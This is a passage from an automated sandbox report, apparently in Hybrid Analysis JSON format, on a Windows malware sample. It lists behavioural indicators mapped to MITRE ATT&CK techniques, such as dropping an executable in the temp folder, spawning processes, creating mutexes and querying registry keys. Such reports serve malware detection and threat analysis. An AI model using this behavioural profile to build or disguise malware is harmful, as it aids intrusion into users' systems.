parameter CoTaskMemFree (UID: 00000000-00002968)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter EventRegister (UID: 00000000-00002968)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegGetValueA (UID: 00000000-00002968)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExA (UID: 00000000-00002968)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CoTaskMemAlloc (UID: 00000000-00002968)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00002940)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"14001500da59eb76@api-ms-win-downlevel-advapi32-l1-1-0.dll\"\n \"130014008e5aeb76@api-ms-win-downlevel-advapi32-l1-1-0.dll\"\n \"15001600c03e056b@ADVAPI32.dll\"\n \"0e000f00703f056b@ADVAPI32.dll\"\n \"0e000f00cc3f056b@ADVAPI32.dll\"\n \"11001200b447056b@ADVAPI32.dll\"\n \"110012004848056b@ADVAPI32.dll\"\n \"120013008c48056b@ADVAPI32.dll\"\n \"12001300e448056b@ADVAPI32.dll\"\n \"14001500386e056b@ADVAPI32.dll\"\n \"14001500506e056b@ADVAPI32.dll\"\n \"14001500686e056b@ADVAPI32.dll\"\n \"17001800806e056b@ADVAPI32.dll\"\n \"0d000e00986e056b@ADVAPI32.dll\"\n \"11001200a86e056b@ADVAPI32.dll\"\n \"11001200bc6e056b@ADVAPI32.dll\"\n \"0d000e004466056b@WININET.dll\"\n \"0d000e00b466056b@WININET.dll\"\n \"10001100ec66056b@WININET.dll\"\n \"100011009067056b@WININET.dll\"\n \"10001100006f056b@WININET.dll\"\n \"10001100146f056b@WININET.dll\"\n \"14001500286f056b@WININET.dll\"\n \"14001500406f056b@WININET.dll\"\n \"12001300586f056b@WININET.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43.exe\" called \"CreateProcessW\" with parameter \":*C:\\94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43.exe *\" - (UID: 00000000-00004900)\n \"085cda53603755dc.exe\" called \"CreateProcessW\" with parameter \"a ZZZZZZXQTRG\" - (UID: 00000000-00002968)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-267", "type": 6, "relevance": 1, "name": "Writes files in a temp directory", "description": "\"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\"", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43\" has an executable section named \".text\"\n \"085cda53603755dc.exe\" has an executable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43\" has an writable section named \".data\"\n \"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43\" has an writable section named \".bss\"\n \"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43\" has an writable section named \".idata\"\n \"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43\" has an writable section named \".CRT\"\n \"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43\" has an writable section named \".tls\"\n \"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43\" has an writable section named \".rsrc\"\n \"085cda53603755dc.exe\" has an writable section named \".data\"\n \"085cda53603755dc.exe\" has an writable section named \".bss\"\n \"085cda53603755dc.exe\" has an writable section named \".idata\"\n \"085cda53603755dc.exe\" has an writable section named \".CRT\"\n \"085cda53603755dc.exe\" has an writable section named \".tls\"\n \"085cda53603755dc.exe\" has an writable section named \".rsrc\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 74e10000\n \"085cda53603755dc.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 74e10000\n \"085cda53603755dc.exe\" loaded module \"SECUR32.DLL\" at base 74ca0000\n \"085cda53603755dc.exe\" loaded module \"RPCRT4.DLL\" at base 75640000\n \"085cda53603755dc.exe\" loaded module \"SHELL32.DLL\" at base 75f70000\n \"085cda53603755dc.exe\" loaded module \"PROFAPI.DLL\" at base 74f80000\n \"085cda53603755dc.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L2-1-0.DLL\" at base 6fd50000\n \"085cda53603755dc.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-OLE32-L1-1-0.DLL\" at base 75170000\n \"085cda53603755dc.exe\" loaded module \"WS2_32.DLL\" at base 75600000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75640000\n \"085cda53603755dc.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75640000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"085cda53603755dc.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"085cda53603755dc.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00002968)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00002968)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l2-1-0.dll (UID: 00000000-00002968)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-ole32-l1-1-0.dll (UID: 00000000-00002968)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00002968)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"085cda53603755dc.exe\" with commandline \":*C:\\\\94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e ...\" (UID: 00000000-00002968)\n Spawned process \"085cda53603755dc.exe\" with commandline \"a ZZZZZZXQTRG\" (UID: 00000000-00002940)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"085cda53603755dc.exe\" with commandline \":*C:\\\\94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e ...\" (UID: 00000000-00002968)\n Spawned process \"085cda53603755dc.exe\" with commandline \"a ZZZZZZXQTRG\" (UID: 00000000-00002940)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43\" was detected as \"MinGW\" and name: \"Compiler\"\n \"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43\" was detected as \"GNU linker ld (GNU Binutils)\" and name: \"Linker\"\n \"085cda53603755dc.exe\" was detected as \"MinGW\" and name: \"Compiler\"\n \"085cda53603755dc.exe\" was detected as \"GNU linker ld (GNU Binutils)\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\Global\\giojheiowrghtiovhjwiojrug\"\n \"Global\\giojheiowrghtiovhjwiojrug\"\n \"\\Sessions\\1\\BaseNamedObjects\\Global\\giojheiowrghtiovhjwiojrugzyb\"\n \"Global\\giojheiowrghtiovhjwiojrugzyb\"", "origin": "Created Mutant"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"085cda53603755dc.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43\" file has an entrypoint instructions - \"sub\tesp, 0xc,mov\tdword ptr [0x534fd4], 1,call\t0x4131e0,add\tesp, 0xc,jmp\t0x401180,lea\tesi, [esi],sub\tesp, 0xc,mov\tdword ptr [0x534fd4], 0,call\t0x4131e0,add\tesp, 0xc,jmp\t0x401180,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,mov\tebp, esp,sub\tesp, 0x18,mov\teax, dword ptr [0x4802d0],test\teax, eax,je\t0x40153b,mov\tdword ptr [esp], 0x481020,call\tdword ptr [0x5365c0],mov\tedx, 0,sub\tesp, 4,\"\n \"085cda53603755dc.exe\" file has an entrypoint instructions - \"sub\tesp, 0xc,mov\tdword ptr [0x534fd4], 1,call\t0x4131e0,add\tesp, 0xc,jmp\t0x401180,lea\tesi, [esi],sub\tesp, 0xc,mov\tdword ptr [0x534fd4], 0,call\t0x4131e0,add\tesp, 0xc,jmp\t0x401180,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,mov\tebp, esp,sub\tesp, 0x18,mov\teax, dword ptr [0x4802d0],test\teax, eax,je\t0x40153b,mov\tdword ptr [esp], 0x481020,call\tdword ptr [0x5365c0],mov\tedx, 0,sub\tesp, 4,\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "binary-33", "type": 8, "relevance": 3, "name": "Drops executable files inside temp directory", "description": "\"085cda53603755dc.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows\"- Location: [%TEMP%\\085cda53603755dc.exe]- [targetUID: 00000000-00002940]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "string-481", "type": 2, "relevance": 1, "name": "Reference explorer.exe process", "description": "Found string \"explorer.exe\" (Indicator: \"explorer.exe\"; File: \"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43\")", "origin": "File/Memory", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43.exe\" trying to touch file \"C:\\version.DLL\"\n \"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43.exe\" trying to touch file \"C:\\Windows\\system32\\version.DLL\"\n \"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43.exe\" trying to touch file \"C:\\Users\\%OSUSER%\\Documents\"\n \"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43.exe\" trying to touch file \"C:\\Windows\\system32\\apphelp.dll\"\n \"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43.exe\" trying to touch file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43.exe\" trying to touch file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\"\n \"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43.exe\" trying to touch file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\ui\\SwDRM.dll\"\n \"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43.exe\" trying to touch file \"C:\\Windows\\System32\\sechost.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43.exe\" trying to access non-existent file \"C:\\version.DLL\"\n \"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43.exe\" trying to access non-existent file \"C:\\VERSION.DLL\"\n \"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"\n \"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-LOCALIZATION-L1-2-1.DLL\"\n \"085cda53603755dc.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\version.DLL\"\n \"085cda53603755dc.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\FLTLIB.DLL\"\n \"085cda53603755dc.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"085cda53603755dc.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"085cda53603755dc.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\Secur32.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\temp\\085cda53603755dc.exe\"\n \"085cda53603755dc.exe\" writes file \"%temp%\\085cda53603755dc.exe\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43.exe\" reads file \"c:\\94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43.exe\"\n \"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43.exe\" reads file \"c:\\users\\%osuser%\\appdata\\local\\temp\\085cda53603755dc.exe\"\n \"085cda53603755dc.exe\" reads file \"c:\\users\\%osuser%\\appdata\\local\\temp\\085cda53603755dc.exe\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"085cda53603755dc.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows\"- Location: [%TEMP%\\085cda53603755dc.exe]- [targetUID: 00000000-00002940]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"085cda53603755dc.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"085cda53603755dc.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\counters.dat\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"CWDILLEGALINDLLSEARCH\"; Value: \"\")\n \"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSAPPCOMPAT\"; Value: \"\")\n \"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSUSERENABLED\"; Value: \"\")\n \"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\"; Value: \"\")\n \"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"COMPATDLL\"; Value: \"\")\n \"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"00060101.00060101\"; Value: \"\")\n \"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"SAFEDLLSEARCHMODE\"; Value: \"\")\n \"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"DISABLEMETAFILES\"; Value: \"\")\n \"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"94EDAC68F5356F7BB1CA5DB827FC6D4DC183D5BB77E2EE9C8C1A9A402E3FEA43\"; Value: \"\")\n \"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\"; Key: \"PREFERREDUILANGUAGES\"; Value: \"\")\n \"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\"; Key: \"MACHINEPREFERREDUILANGUAGES\"; Value: \"\")\n \"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"LOADAPPINIT_DLLS\"; Value: \"\")\n \"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORUSESYSTEMHEAP\"; Value: \"\")\n \"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORSYSTEMHEAPISPRIVATE\"; Value: \"\")\n \"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\DATACOLLECTION\"; Key: \"COMMERCIALDATAOPTIN\"; Value: \"\")\n \"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\FOLDERDESCRIPTIONS\\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\"; Key: \"CATEGORY\"; Value: \"\")\n \"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\FOLDERDESCRIPTIONS\\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\"; Key: \"NAME\"; Value: \"\")\n \"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\FOLDERDESCRIPTIONS\\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\"; Key: \"PARENTFOLDER\"; Value: \"\")\n \"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\FOLDERDESCRIPTIONS\\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\"; Key: \"DESCRIPTION\"; Value: \"\")\n \"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\FOLDERDESCRIPTIONS\\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\"; Key: \"RELATIVEPATH\"; Value: \"\")\n \"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\FOLDERDESCRIPTIONS\\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\"; Key: \"PARSINGNAME\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"94edac68f5356f7bb1ca5db827fc6d4dc183d5bb77e2ee9c8c1a9a402e3fea43.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"\"; Value: \"\")\n 